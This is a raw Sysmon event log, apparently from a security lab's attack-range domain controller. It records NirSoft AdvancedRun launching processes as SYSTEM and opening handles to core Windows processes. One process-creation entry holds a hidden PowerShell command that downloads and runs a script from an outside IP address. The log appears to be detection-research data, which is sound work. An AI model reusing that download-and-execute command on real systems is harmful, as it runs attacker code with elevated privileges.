20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.038{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004077829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.038{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004077828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.037{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
tiveImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTAC
KRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004077749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.615{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfgC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004077225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.224{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004077218Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.219{834264DD-148F-61EB-8D08-000000002702}5728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))""C:\Windows\System32\NT 
AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004077217Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.217{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077216Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.217{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-148F-61EB-8C08-000000002702}2216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004077215Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.215{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077214Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-148F-61EB-8B08-000000002702}1504C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077213Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077212Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077211Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.214{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
